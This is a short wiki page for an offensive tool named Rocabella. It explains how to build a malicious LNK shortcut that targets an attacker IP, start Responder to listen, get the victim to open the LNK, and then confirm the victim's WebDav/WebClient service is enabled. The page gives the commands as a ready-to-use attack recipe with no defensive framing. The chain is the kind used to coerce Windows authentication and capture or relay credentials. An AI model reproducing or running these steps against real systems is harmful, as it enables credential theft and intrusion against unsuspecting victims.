Skip to content
Nikos Vourdas edited this page Apr 16, 2024 · 8 revisions

About

In this example we will create a malicious LNK to enable WebDav service.

Create LNK

.\Rocabella.exe lnk -t 192.168.242.138 -s example -o mylnk-example -d "Example LNK"

Create-LNK-Example

Enable WebDav (Win10/11)

Open Responder:

responder -I eth0

Run the malicious LNK from victim's side.

Check WebDav service:

Enabling-Webclient

Clone this wiki locally